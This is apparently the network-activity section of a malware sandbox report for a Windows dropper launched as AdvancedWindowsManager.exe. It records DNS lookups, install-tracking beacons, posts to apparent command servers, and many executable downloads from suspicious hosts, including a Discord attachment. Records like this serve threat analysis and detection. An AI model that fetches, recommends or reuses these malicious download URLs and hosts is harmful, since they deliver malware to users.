-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 80802⤵
-
Network
-
DNShsiens.xyzRemote address:8.8.8.8:53Requesthsiens.xyzIN AResponsehsiens.xyzIN A104.21.87.76hsiens.xyzIN A172.67.142.91 -
DNSa.goatgame.coRemote address:8.8.8.8:53Requesta.goatgame.coIN AResponsea.goatgame.coIN A172.67.146.70a.goatgame.coIN A104.21.79.144
-
GEThttp://hsiens.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=150&oname[]=03Sep0330PM_UPD3Sep&oname[]=7&oname[]=1&oname[]=3&oname[]=2&oname[]=4&oname[]=5&cnt=6Remote address:104.21.87.76:80RequestGET /addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=150&oname[]=03Sep0330PM_UPD3Sep&oname[]=7&oname[]=1&oname[]=3&oname[]=2&oname[]=4&oname[]=5&cnt=6 HTTP/1.1
Host: hsiens.xyz
Accept: */*
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:29:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iCL9mclFvEHp5Mnah8CQMgmUU6e%2F9BcK5CHGGCLJfTFuihsbYIkaf8akwwJyiT8pLpKikv0qu07I910B6McSpIeT%2FFMahlEfoQnf1tpJE1981eTeXTiAnBsFiqPA"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6ac0d9c564bf5-AMS
-
GEThttps://a.goatgame.co/userf/dat/2302/sqlite.datRemote address:172.67.146.70:443RequestGET /userf/dat/2302/sqlite.dat HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: a.goatgame.co
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:29:20 GMT
Content-Length: 578669
Connection: keep-alive
last-modified: Wed, 28 Jul 2021 11:35:53 GMT
etag: "8d46d-5c82d6397d18a"
accept-ranges: bytes
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EAAuAacTXyMK4TUDbkBqsV2mI4sgB7giif6BnVDfyRhF9OJ0QEhoziAG2SeTuEVj9wtEliS8hcmxpB8kxtfgfe%2BENKISWAdeGjJoecvsqIh94SZVvWUfddgK7v7hGQWq"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6ac1c8a2e012a-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://a.goatgame.co/userf/dat/sqlite.dllRemote address:172.67.146.70:443RequestGET /userf/dat/sqlite.dll HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: a.goatgame.co
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:29:22 GMT
Content-Type: application/x-msdownload
Content-Length: 13312
Connection: keep-alive
last-modified: Fri, 27 Aug 2021 04:30:17 GMT
etag: "3400-5ca82f0bd6e46"
accept-ranges: bytes
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ME58zFX5E8KpX1yqfZZJOLhZkZmG%2BzShrpIVnpQKTBDtlzHpLuD9uShGu9WRftUp5VrA4ciMLaJat8PH7K2Pi1YlUZIu7mDSinyjrPOpZFyHwCnVP%2F%2BxNSu%2BvO%2FD0abM"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6ac283833012a-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
DNSsafialinks.comRemote address:8.8.8.8:53Requestsafialinks.comIN AResponsesafialinks.comIN A162.0.213.132
-
HEADhttp://safialinks.com/Installer_Provider/UltraMediaBurner.exeRemote address:162.0.213.132:80RequestHEAD /Installer_Provider/UltraMediaBurner.exe HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.5
Host: safialinks.com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:29:30 GMT
Server: Apache
Last-Modified: Wed, 01 Sep 2021 18:29:30 GMT
ETag: "74c00-5caf33f373680"
Accept-Ranges: bytes
Content-Length: 478208
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
-
GEThttp://safialinks.com/Installer_Provider/UltraMediaBurner.exeRemote address:162.0.213.132:80RequestGET /Installer_Provider/UltraMediaBurner.exe HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.5
Host: safialinks.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:29:30 GMT
Server: Apache
Last-Modified: Wed, 01 Sep 2021 18:29:30 GMT
ETag: "74c00-5caf33f373680"
Accept-Ranges: bytes
Content-Length: 478208
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/x-msdos-program
-
DNSromkaxarit.tumblr.comRemote address:8.8.8.8:53Requestromkaxarit.tumblr.comIN AResponseromkaxarit.tumblr.comIN A74.114.154.22romkaxarit.tumblr.comIN A74.114.154.18
-
GEThttps://romkaxarit.tumblr.com/Remote address:74.114.154.22:443RequestGET / HTTP/1.1
Host: romkaxarit.tumblr.com
-
DNSconnectini.netRemote address:8.8.8.8:53Requestconnectini.netIN AResponseconnectini.netIN A162.0.210.44
-
POSThttps://connectini.net/Series/SuperNitou.phpRemote address:162.0.210.44:443RequestPOST /Series/SuperNitou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: connectini.net
Content-Length: 51
Expect: 100-continue
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:29:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.33
X-Powered-By: PleskLin
-
DNScdn.discordapp.comRemote address:8.8.8.8:53Requestcdn.discordapp.comIN AResponsecdn.discordapp.comIN A162.159.134.233cdn.discordapp.comIN A162.159.133.233cdn.discordapp.comIN A162.159.130.233cdn.discordapp.comIN A162.159.129.233cdn.discordapp.comIN A162.159.135.233
-
GEThttps://cdn.discordapp.com/attachments/873244194234318850/883286025894522900/pctool.exeRemote address:162.159.134.233:443RequestGET /attachments/873244194234318850/883286025894522900/pctool.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:29:42 GMT
Content-Type: application/x-msdos-program
Content-Length: 2673152
Connection: keep-alive
CF-Ray: 68a6acaaeb0b4c79-AMS
Accept-Ranges: bytes
Age: 250298
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=pctool.exe
ETag: "12c9f4570b054f0a6696a0a62c06a5c8"
Expires: Tue, 06 Sep 2022 09:29:42 GMT
Last-Modified: Fri, 03 Sep 2021 09:43:19 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1630662199340533
x-goog-hash: crc32c=5bjC2A==
x-goog-hash: md5=Esn0VwsFTwpmlqCmLAalyA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 2673152
X-GUploader-UploadID: ADPycdsw2EAq32DQ1qoJ4aV48QczoSP1fSxMq35TdPoo5kxv0EM4oPaklSJYmPT3MCaOOzIqixuu8kYVTpUZ3fI--n1r1Fp2dQ
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sYH5T1HICxnM1uHHx%2BMAvQodDsHICH2hnnGEfM8qQfQFequae30IIxZZd79uypziIuhrlGV0x5sUK%2Bf6mv2veqxFq4PlCpadJ7jjiBCM1JTG1ZpHIXBaOG1nVZe8BvLVYvzAvw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
-
DNSsafialinks.comRemote address:8.8.8.8:53Requestsafialinks.comIN AResponsesafialinks.comIN A162.0.213.132
-
GEThttp://safialinks.com/Widgets/ultramediaburner.exeRemote address:162.0.213.132:80RequestGET /Widgets/ultramediaburner.exe HTTP/1.1
Host: safialinks.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:29:48 GMT
Server: Apache
Last-Modified: Tue, 22 Jun 2021 14:14:00 GMT
ETag: "81d73-5c55b66be5a00"
Accept-Ranges: bytes
Content-Length: 531827
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
-
GEThttp://safialinks.com/L3CKQSg3wbJyCsvFNeyUtJP4qUBxcV/cpm-provider/nfdbssmwan23dzjn.exeRemote address:162.0.213.132:80RequestGET /L3CKQSg3wbJyCsvFNeyUtJP4qUBxcV/cpm-provider/nfdbssmwan23dzjn.exe HTTP/1.1
Host: safialinks.com
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:29:49 GMT
Server: Apache
Last-Modified: Wed, 01 Sep 2021 12:46:24 GMT
ETag: "50200-5caee7431c800"
Accept-Ranges: bytes
Content-Length: 328192
Content-Type: application/x-msdos-program
-
GEThttp://safialinks.com/L3CKQSg3wbJyCsvFNeyUtJP4qUBxcV/kenpachi/5d3cdh4z6b5ytg2t.exeRemote address:162.0.213.132:80RequestGET /L3CKQSg3wbJyCsvFNeyUtJP4qUBxcV/kenpachi/5d3cdh4z6b5ytg2t.exe HTTP/1.1
Host: safialinks.com
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:29:49 GMT
Server: Apache
Last-Modified: Wed, 01 Sep 2021 18:00:50 GMT
ETag: "77e00-5caf2d8b21880"
Accept-Ranges: bytes
Content-Length: 491008
Content-Type: application/x-msdos-program
-
GEThttp://safialinks.com/L3CKQSg3wbJyCsvFNeyUtJP4qUBxcV/post-install-provider/r2dcfcbx72q3cxze.exeRemote address:162.0.213.132:80RequestGET /L3CKQSg3wbJyCsvFNeyUtJP4qUBxcV/post-install-provider/r2dcfcbx72q3cxze.exe HTTP/1.1
Host: safialinks.com
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:29:50 GMT
Server: Apache
Last-Modified: Thu, 02 Sep 2021 14:42:00 GMT
ETag: "94a00-5cb042f741e00"
Accept-Ranges: bytes
Content-Length: 608768
Content-Type: application/x-msdos-program
-
DNSrequestimmersive.comRemote address:8.8.8.8:53Requestrequestimmersive.comIN AResponserequestimmersive.comIN A162.0.220.187
-
POSThttp://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpegRemote address:162.0.220.187:80RequestPOST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimmersive.com
Content-Length: 224
Expect: 100-continue
Accept-Encoding: gzip
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx/1.21.1
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 49
Date: Mon, 06 Sep 2021 09:29:50 GMT
-
DNSqwertys.infoRemote address:8.8.8.8:53Requestqwertys.infoIN AResponseqwertys.infoIN A104.21.20.198qwertys.infoIN A172.67.194.30
-
GEThttps://qwertys.info/dcc7975c8a99514da06323f0994cd79b.exeRemote address:104.21.20.198:443RequestGET /dcc7975c8a99514da06323f0994cd79b.exe HTTP/1.1
Host: qwertys.info
Connection: Keep-Alive
ResponseHTTP/1.1 302 Found
Date: Mon, 06 Sep 2021 09:29:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
location: https://timpler.info/dcc7975c8a99514da06323f0994cd79b.exe
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5OdvUmKbdrtw1WpZOGLWkWPWAeP7gOqVsQ4SoCiT1UZEBbzcMQLV45ZIywSFPiJoS8VplMG%2FnpuRN5IHSW%2BXzPxK%2F51fHJbjOq3zzSa85T2wVQAB8%2BjkDA%2F6gZdHmzE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6acddcae3c781-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
DNSiplogger.orgRemote address:8.8.8.8:53Requestiplogger.orgIN AResponseiplogger.orgIN A88.99.66.31
-
GEThttps://iplogger.org/1cmAy7Remote address:88.99.66.31:443RequestGET /1cmAy7 HTTP/1.1
Host: iplogger.org
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:29:51 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=54l0k2lhdt909l0k7d407ro852; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=248127600; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers: 3
whoami: c3af235b5b9c8f8c0657cab7c8c85f85d97100c7d13cb4fb6626c667e06b697f
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
-
DNStimpler.infoRemote address:8.8.8.8:53Requesttimpler.infoIN AResponsetimpler.infoIN A172.67.193.86timpler.infoIN A104.21.84.135
-
GEThttps://timpler.info/dcc7975c8a99514da06323f0994cd79b.exeRemote address:172.67.193.86:443RequestGET /dcc7975c8a99514da06323f0994cd79b.exe HTTP/1.1
Host: timpler.info
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:29:51 GMT
Content-Type: application/octet-stream
Content-Length: 4617256
Connection: keep-alive
last-modified: Mon, 06 Sep 2021 08:51:07 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 2317
Accept-Ranges: bytes
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=388LEBTcFjTzyixrbDbel7kQkpU%2BCRkYL5CRlTwo1UKAXWvBH8%2BQI7ucs5GyOjEeFZ0flN6%2B%2BgxJ7u9wqeteTFYqKyokCwqEKsOZaSclDLh4Kr4yqpULSvg35CnmBIM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6acde89e4faa0-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttp://www.google.com/Remote address:142.250.179.132:80RequestGET / HTTP/1.1
Host: www.google.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:29:53 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: NID=222=NFZ8lJKrrCQxwAn5Q3i9Aykt9uWgrxIzwfqyTrSOIxSdWnvbRA7qLUZxazfRz_BiHCPDKoS-8YcP6kd_NyxmgPrI48K0JZXAlkjAFuBdV3mPILUVzejxzvx6Q4-cve4NA2FuBLyhfiR5mShU0PmkHuO2-HedX3KVfAa5QMu2vVM; expires=Tue, 08-Mar-2022 09:29:53 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
-
DNSconnectini.netRemote address:8.8.8.8:53Requestconnectini.netIN AResponseconnectini.netIN A162.0.210.44
-
POSThttps://connectini.net/Series/Conumer4Publisher.phpRemote address:162.0.210.44:443RequestPOST /Series/Conumer4Publisher.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: connectini.net
Content-Length: 53
Expect: 100-continue
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:29:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.33
X-Powered-By: PleskLin
-
GEThttps://connectini.net/Series/publisher/1/NL.jsonRemote address:162.0.210.44:443RequestGET /Series/publisher/1/NL.json HTTP/1.1
Host: connectini.net
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:30:03 GMT
Content-Type: application/json
Content-Length: 4908
Last-Modified: Thu, 18 Mar 2021 13:08:23 GMT
Connection: keep-alive
ETag: "605350c7-132c"
X-Powered-By: PleskLin
Accept-Ranges: bytes
-
DNStheonlinesportsgroup.netRemote address:8.8.8.8:53Requesttheonlinesportsgroup.netIN AResponse
-
DNSconnect.scroll.comRemote address:8.8.8.8:53Requestconnect.scroll.comIN AResponseconnect.scroll.comIN A35.201.100.179
-
DNSremotenetwork.xyzRemote address:8.8.8.8:53Requestremotenetwork.xyzIN AResponse
-
DNSgavenetwork.barRemote address:8.8.8.8:53Requestgavenetwork.barIN AResponsegavenetwork.barIN A172.67.141.201gavenetwork.barIN A104.21.41.27
-
DNScleaner-partners.bizRemote address:8.8.8.8:53Requestcleaner-partners.bizIN AResponsecleaner-partners.bizIN A46.8.29.181cleaner-partners.bizIN A5.230.68.37
-
GEThttp://cleaner-partners.biz/check.php?pub=mixshopRemote address:46.8.29.181:80RequestGET /check.php?pub=mixshop HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: fB-p1-PT-Xa-U-L
Host: cleaner-partners.biz
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:29:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
-
DNSlive.goatgame.liveRemote address:8.8.8.8:53Requestlive.goatgame.liveIN AResponselive.goatgame.liveIN A104.21.70.98live.goatgame.liveIN A172.67.222.125
-
DNSlumtest.comRemote address:8.8.8.8:53Requestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNSip-api.comRemote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
GEThttps://live.goatgame.live/userf/dat/3002/sqlite.datRemote address:104.21.70.98:443RequestGET /userf/dat/3002/sqlite.dat HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: live.goatgame.live
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:30:01 GMT
Content-Length: 578669
Connection: keep-alive
last-modified: Wed, 28 Jul 2021 11:35:52 GMT
etag: "8d46d-5c82d6384d5ab"
accept-ranges: bytes
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LKHSsc32OehgDIAg%2BHf2h1TyybE7h1F%2BzDOwbOuP%2B8VQ5ydBh%2By%2FRV%2B8IiOEn5lUsqGAYsR0FsMeQbArYOIUVd6hz6rAAzkLI2GecHN8OZR%2F6GjoRAJgt8OCBJkWCwfWZexxJFA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6ad1c993800be-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://live.goatgame.live/userf/dat/sqlite.dllRemote address:104.21.70.98:443RequestGET /userf/dat/sqlite.dll HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: live.goatgame.live
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:30:03 GMT
Content-Type: application/x-msdownload
Content-Length: 13312
Connection: keep-alive
last-modified: Fri, 27 Aug 2021 04:30:17 GMT
etag: "3400-5ca82f0bd6e46"
accept-ranges: bytes
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lVmQPMUD6580msIzGQETZCc1QxI%2FpEdgRwNZWOg%2FQDlUJSCaOOOo6iKNKX5f%2FUb%2BK4nYGU53V5tE2F8y3xMPy7RuG59ulAQU0svbQopNpAlC7ysksjoB5OzI1mX8YZs3YhAMe20%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6ad27c86100be-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttp://ip-api.com/json/Remote address:208.95.112.1:80RequestGET /json/ HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Host: ip-api.com
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:30:00 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 323
Access-Control-Allow-Origin: *
X-Ttl: 22
X-Rl: 30
-
DNSliveme31.comRemote address:8.8.8.8:53Requestliveme31.comIN AResponseliveme31.comIN A104.21.13.27liveme31.comIN A172.67.132.120
-
HEADhttp://liveme31.com/74.exeRemote address:104.21.13.27:80RequestHEAD /74.exe HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.5
Host: liveme31.com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:30:03 GMT
Content-Type: application/octet-stream
Content-Length: 119296
Connection: keep-alive
last-modified: Wed, 01 Sep 2021 13:37:12 GMT
etag: "612f8208-1d200"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
CF-Cache-Status: HIT
Age: 413576
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VxTQust%2Fn41Q2MfTryd4YsgSQcbBdUI%2BVOraZoeWOJIM9HTzifOERWG5PKJXvKzJRfuBEzEsoSN1jVqVOiZ%2BD2Zb16G87zMNfgzbhIV7ysFAD763MvcgTPXEENf9BLs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6ad2989844266-AMS
-
GEThttp://liveme31.com/74.exeRemote address:104.21.13.27:80RequestGET /74.exe HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.5
Host: liveme31.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:30:05 GMT
Content-Type: application/octet-stream
Content-Length: 119296
Connection: keep-alive
last-modified: Wed, 01 Sep 2021 13:37:12 GMT
etag: "612f8208-1d200"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
CF-Cache-Status: HIT
Age: 413578
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8C%2FiofXaNrwzrnqspSy8euXCxuiKY3DcxdL8pCI7bH9ashhziNY8OfurlP3ZSTGYIb6UX0Kn0RNg8zOpmfkUGsWN6Rp8t%2FnMwxw%2B%2FdkMmzlLTlRPnPsCoSRZjVhNy88%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6ad384b404266-AMS
-
DNSwww.profitabletrustednetwork.comRemote address:8.8.8.8:53Requestwww.profitabletrustednetwork.comIN AResponsewww.profitabletrustednetwork.comIN A192.243.59.13www.profitabletrustednetwork.comIN A192.243.59.20www.profitabletrustednetwork.comIN A192.243.59.12
-
DNSdownloadlog.comRemote address:8.8.8.8:53Requestdownloadlog.comIN AResponsedownloadlog.comIN A188.119.65.241
-
GEThttp://downloadlog.com/74.asdffRemote address:188.119.65.241:80RequestGET /74.asdff HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
Host: downloadlog.com
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:30:12 GMT
Content-Length: 247808
Connection: close
Last-Modified: Wed, 01 Sep 2021 13:38:41 GMT
ETag: "3c800-5caef2f32f367"
Accept-Ranges: bytes
-
DNSnopedope1.comRemote address:8.8.8.8:53Requestnopedope1.comIN AResponsenopedope1.comIN A104.21.6.118nopedope1.comIN A172.67.134.210
-
GEThttps://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6Remote address:192.243.59.13:443RequestGET /e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.profitabletrustednetwork.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx/1.17.6
Date: Mon, 06 Sep 2021 09:30:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: u_pl=14575867; expires=Tue, 07 Sep 2021 09:30:29 GMT
Set-Cookie: ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ImlkIjoxNDU3NTg2NywiayI6ImE5NzFiYmU0YTQwYTcyMTZhMWE4N2Q4ZjQ1NWY3MWU2Iiwic2lkIjoiIiwiaXNpZCI6MiwiYXNpZCI6MSwiemlkIjoxMDYzMzYsInBpZCI6ODUxNTUsImFuIjp0cnVlLCJsYW4iOnRydWUsImNpZCI6MywiYWlkIjoyOCwicHQiOjQsInBrIjoiZTJxOHp1OWh1IiwiY3BrcyI6eyAiMzQiOiJiOGI2ZGRmN2IwNzdlMDgwMmYyYzMxMGU1MjgwM2ExZCJ9LCJ0IjoxfSwidSI6eyJ1IjoxLCJhdSI6MSwiZCI6eyJpZCI6MTU3NjAxLCJpZHMiOiIiLCJpYyI6ZmFsc2UsIm4iOiJEZXNrdG9wfEVtdWxhdG9yIiwidiI6IlVua25vd24iLCJtIjoiVW5rbm93biIsImYiOjEsImZuIjoiRGVza3RvcCIsIm9pZCI6NzEzMywib24iOiJXaW5kb3dzIiwib3YiOiI3IiwiYmlkIjoyMTQ2MSwiYm4iOiJJbnRlcm5ldCBFeHBsb3JlciIsImJ2IjoiMTEuMCIsInd2IjpmYWxzZSwiZSI6ZmFsc2UsImFiIjpmYWxzZX0sImMiOnsiaWQiOjIyMywiYyI6IlVTIiwibiI6IlVuaXRlZCBTdGF0ZXMifSwiYSI6ZmFsc2UsImNyIjp7Im4iOiJDb2dlbnQgQ29tbXVuaWNhdGlvbnMifSwieGYiOiIiLCJpeGYiOmZhbHNlLCJpZ3hmIjpmYWxzZSwidXAiOnRydWUsInIiOiIifX